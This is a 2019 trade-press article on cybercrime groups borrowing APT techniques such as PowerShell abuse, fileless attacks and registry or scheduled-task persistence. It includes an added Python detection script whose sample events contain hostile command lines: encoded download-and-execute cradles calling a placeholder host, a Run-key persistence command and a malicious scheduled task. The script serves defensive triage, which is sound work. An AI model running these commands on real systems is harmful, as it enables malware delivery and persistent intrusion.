Cybercrime groups raise the bar for security teams by borrowing APT techniques

Cybercriminals now have access to more nation-state tradecraft and tooling, and use it to launch more sophisticated advanced persistent threat attacks. That's bad news for defenders.

For the past several years, an increasing number of cybercrime groups have adopted techniques and procedures traditionally used by state-sponsored actors. This trend has caught many organizations unprepared, especially small and medium-sized businesses whose defenses are generally built around commodity malware.

The term advanced persistent threat (APT) is typically used to describe targeted attacks where hackers compromise systems with custom or hard-to-detect tools and then perform lateral movement using stealthy techniques that often involve manual hacking. This type of approach has historically been used by groups interested in espionage with the goal of remaining undetected for extended periods of time so they can observe and steal as many secrets as possible.

Meanwhile, cybercrime groups were known to use malware bought from underground markets, to exploit known vulnerabilities, to launch widespread attacks, and to generally focus on getting a quick return on their investment rather than being stealthy. First and foremost, cybercrime groups differentiated themselves from espionage ones by having a financial motive like stealing money directly from victims' accounts, stealing data that could be monetized in some way, forcing victims to pay ransoms and fake fines and so on.

However, the majority of significant cybercrime attacks observed recently used APT techniques, so the technical borders between them are disappearing and these groups are learning from each other, Costin Raiu, director of the Global Research and Analysis Team at Kaspersky Lab, tells CSO.

Now, some cyberespionage actors regularly use commercial and publicly available malware to complicate attribution efforts and there are cybercrime groups for whom stealthiness and manual hacking have become important components in their operations. The North Korean Lazarus group, for example, is an unusual APT group that used to engage in espionage and sabotage, but which has transitioned to financially motivated attacks. Over the past few years, the group has hit central banks and cryptocurrency exchanges around the world, possibly in an attempt to steal funds for the North Korean government, which has been under global economic sanctions for a long time.

On the other side, cybercrime groups like Carbanak have stolen hundreds of millions of dollars from banks and other financial institutions around the world by using APT-style attacks. These newer, more sophisticated cybercrime groups lurk inside their victims' networks for weeks or months to gain extensive access and learn the organization's workflows before they strike.

Why is the APT landscape changing?

"I think there are two broader trends that are at play," says Tim Maurer, author of Cyber Mercenaries: The State, Hackers, and Power and co-director of the Cyber Policy Initiative at the Carnegie Endowment for International Peace, a foreign-policy think tank. "The first one is that in some countries the relationship between the state and the criminal underground is actually one where criminals will be allowed certain types of the activities as long as it's to the benefit of the state."

There have long been rumors in the security community that intelligence agencies in countries like Russia or China are contracting cybercriminals for intelligence operations, either directly or through intermediaries. An example of this came to light in 2017, when the U.S. Department of Justice indicted two officers of the Russian Federal Security Service (FSB) for hiring a known criminal hacker to break into Yahoo's network.

The recruitment of cybercriminals into intelligence operations can obviously lead to an exchange of more sophisticated techniques, tactics and procedures (TTPs) that can then be used in criminal activities as well. However, Maurer believes that this convergence of techniques between the two types of actors is more illustrative of a second trend that he finds more worrisome, and that is the general proliferation of cyber capabilities and actors.

"I think there is this constant dynamic of learning from the best," Maurer tells CSO. "Sometimes criminals might be better than states in what they developed and sometimes states will be better, and the two actors will learn from each other. And that's because so much of this information becomes available publicly and globally."

According to Maurer, considerably more countries now have offensive cyber capabilities than 10 years ago and to get those capabilities, some states have borrowed malware tools from cybercriminals, either because they were good or because they wanted to disguise their own activities. Similarly, when the Shadow Brokers group leaked the EternalBlue exploit, which is believed to have been part of the NSA's toolset, both state-sponsored and criminal groups integrated it into their operations.

As more states are developing these tools and are either using them or losing them, as happened with EternalBlue, the tools will become available to criminals who will then copy them, Maurer says. "Then criminals will become more advanced and some of the states that might just be entering the game will start using the more sophisticated criminal tools. It's a spiral and only the best resourced companies can keep up with this threat evolution over time."

What APT techniques are cybercriminals adopting?

Many cybercrime attacks today make use of PowerShell and other utilities found on Windows systems by default. In the security industry this tactic is known as "living off the land" and it makes detection harder because, unlike traditional malware programs, these tools are not inherently malicious. PowerShell is widely used to automate system administration tasks, and even though Microsoft has added controls to restrict and monitor its use, such as script block logging, Constrained Language Mode and the Antimalware Scan Interface (AMSI), IT teams can't afford to disable it entirely because it would make their job much harder.

PowerShell abuse is also associated with another tactic that has become common in recent years: fileless attacks. These are attacks where hackers inject malicious code into the memory of legitimate processes running on a system, using a variety of techniques such as remote thread injection, asynchronous procedure call (APC) injection, atom bombing, process hollowing, local shellcode injection or reflective loading. The goal is to avoid writing a malicious executable to disk, where antivirus scanners expect to find it. The payload still has to arrive somehow, typically as a script, a document macro or a registry value, so "fileless" rarely means that nothing at all touches the disk.

Besides delivering the initial payload, PowerShell is also often used to achieve persistence: a rogue script or launch command is stored in the registry (for example under a Run key) or in a scheduled task so that the system is reinfected after a reboot. This is necessary because code that exists only in the memory of another process is lost when the machine shuts down.
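The three tactics just described (PowerShell as a living-off-the-land binary, an in-memory payload hidden behind an encoded command, and persistence through a Run key or scheduled task) all leave traces in process-creation telemetry. The script below is an added example, not code from this article or from any vendor quoted in it: it decodes -EncodedCommand blobs the way PowerShell does (base64 over UTF-16LE), scores each command line against the indicators the text mentions, and flags events above a threshold. The four events are constructed for the example (field names loosely follow Sysmon Event ID 1 / Security 4688 conventions), the indicator weights and the threshold of 5 are arbitrary choices, and example.invalid is a placeholder domain.

```python
"""Triage of Windows process-creation events for PowerShell living-off-the-land
abuse, fileless payload delivery and registry/scheduled-task persistence.

Added example. The events, field names, weights and threshold are assumptions
made for illustration, not data from the article."""
import base64
import binascii
import re

# Constructed staging command, encoded the way `powershell -EncodedCommand`
# expects it: UTF-16LE text, then base64.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

# Constructed events with Sysmon Event ID 1 / Security 4688 style field names.
SAMPLE_EVENTS = [
    {   # routine admin use: a script file run from a cmd.exe shell
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"powershell.exe -File C:\scripts\rotate-logs.ps1",
    },
    {   # Office document spawning hidden, encoded PowerShell (fileless loader)
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CommandLine": "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand " + ENCODED,
    },
    {   # persistence: Run key that re-launches a script kept in another registry value
        "Image": r"C:\Windows\System32\reg.exe",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "powershell -w hidden -c iex((gp HKCU:\Software\Classes\CLSID\x).y)"',
    },
    {   # persistence: logon-triggered scheduled task running a download cradle
        "Image": r"C:\Windows\System32\schtasks.exe",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'schtasks /create /sc onlogon /tn "WinUpdate" /tr "powershell -w hidden -ep bypass -c iex (New-Object Net.WebClient).DownloadString(\'http://example.invalid/a\')"',
    },
]

# (regex over the lower-cased command line, weight, label); weights are arbitrary
INDICATORS = [
    (r"-w(?:indowstyle)?\s+hidden", 2, "hidden window"),
    (r"-e(?:p|xec|xecutionpolicy)\s+bypass", 1, "execution policy bypass"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", 3, "download cradle"),
    (r"\biex\b|invoke-expression", 2, "Invoke-Expression"),
    (r"\[reflection\.assembly\]::load|virtualalloc|createremotethread|frombase64string", 3, "in-memory loading"),
    (r"currentversion\\run\b|schtasks\s+/create|register-scheduledtask", 3, "Run key / scheduled task persistence"),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand, or None if there is none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None   # not really base64; treat as absent rather than crash the pipeline
    return raw.decode("utf-16-le", errors="replace")


def score_event(event):
    """Score one process-creation event; returns (score, list of matched labels)."""
    text = event["CommandLine"]
    score, reasons = 0, []
    decoded = decode_encoded_command(text)
    if decoded is not None:
        # scan the real script instead of its base64 wrapper
        text = ENCODED_RE.sub(" ", text) + " " + decoded
        score += 2
        reasons.append("encoded command")
    low = text.lower()
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, low):
            score += weight
            reasons.append(label)
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    if parent in OFFICE_PARENTS and "powershell" in event["Image"].lower():
        score += 3
        reasons.append(f"PowerShell spawned by {parent}")
    return score, reasons


def triage(events, threshold=5):
    """(index, score, reasons) for every event at or above the threshold."""
    hits = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((i, score, reasons))
    return hits


if __name__ == "__main__":
    for i, score, reasons in triage(SAMPLE_EVENTS):
        print(f"event {i}: score {score}: {', '.join(reasons)}")
        decoded = decode_encoded_command(SAMPLE_EVENTS[i]["CommandLine"])
        if decoded:
            print("   decoded:", decoded)
```

The decode step matters more than the keyword list: without it the Office-spawned event would only score on its switches, while the download cradle and Invoke-Expression it actually runs stay hidden inside the base64 blob. Real deployments would feed Sysmon or 4688 events in rather than the constructed list, and tune the weights against their own baseline of legitimate PowerShell use.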

One of the cybercrime groups that almost exclusively uses fileless techniques is FIN7, which is possibly a division of the larger Carbanak group. While Carbanak is known for attacks against banks and other financial organizations, FIN7 targets primarily retailers and companies from the restaurant and hospitality industries. Its goal is to compromise point-of-sale systems and steal payment card data. The U.S. Department of Justice indicted three suspected high-ranking members of FIN7 in August and said that the group has compromised more than 6,500 point-of-sale terminals at over 3,600 business locations across the U.S., stealing more than 15 million payment card records.

Both cybercriminals and state-sponsored groups also abuse tools that were designed for legitimate purposes like penetration testing. These include the open-source Metasploit and PowerSploit frameworks, PowerShell Empire, the commercial Cobalt Strike framework (cracked copies of which circulate widely) and many other freely available utilities for credential dumping, file wiping and other operations.

One of the biggest problems that security companies and malware researchers face is that an increasing number of groups are abusing PowerShell and many of the scripts they use are copied from GitHub and other public sources, so it's becoming very hard to attribute attacks to specific groups, Raiu says.

Registration data for command-and-control servers, technical similarities to previous attacks and the occasional use of custom tools like keyloggers, screenshot grabbers and exploits can also be used to link attacks to certain groups, Raiu says, but in general it's becoming harder and harder to do attribution, he concludes.

How do APT attacks from cybercrime groups impact companies?

When developing IT security strategies and deciding how to spend their limited security budgets, businesses and other organizations work with threat models. This means they determine what types of threats and actors pose the biggest risks to their industry and systems and prioritize resources to counter them. As a result, many companies that are not typical targets for cyberespionage might not have implemented strong defenses against APTs and now have a blind spot when it comes to this new wave of hybrid cybercrime attacks.

To detect APT-style attacks, companies need more than endpoint antivirus programs and firewalls. They need security information and event management (SIEM) and endpoint detection and response (EDR) solutions. These products collect and correlate system and network activity and logs, look for suspicious behavior and generate alerts, which security teams then have to triage.

This means they require more specially trained staff to manage, which can be a serious problem for small and medium-sized businesses due to budget constraints and the cybersecurity skills shortage in general. Even large organizations that can afford to deploy such solutions often have trouble dealing with the large volume of alerts they generate. This can lead to backlogs and alert fatigue, where security staffers dismiss potentially important alerts too easily because of their sheer number and frequency.

Unfortunately, it's common for companies to buy feeds with millions of threat indicators that generate thousands of alerts per day instead of subscribing to smaller feeds that only catch real things, Raiu says. So, it's also about the quality of the feeds used for these tools, as well as the resources available to investigate the alerts. Of course, outsourcing all these tasks to a managed security service provider is always an option and many security companies offer such services to SMBs.

According to Raiu, businesses should consider the fact that they might not be able to prevent a sophisticated persistent attacker from breaking in, so they should focus on solutions that could decrease the time it takes to detect such compromises and respond to them. This means having monitoring solutions in place that can detect anomalies in network and Internet traffic or in endpoint behavior. "I think it is possible to do this even for smaller companies that don't have large budgets," Raiu says.

Tim Maurer believes that for small- and medium-sized companies, the migration to cloud might also potentially be a good solution to protect themselves against these types of sophisticated attacks, because it allows them to benefit from the expertise of the cloud providers' large security teams and better technology.

Copyright © 2019 IDG Communications, Inc.
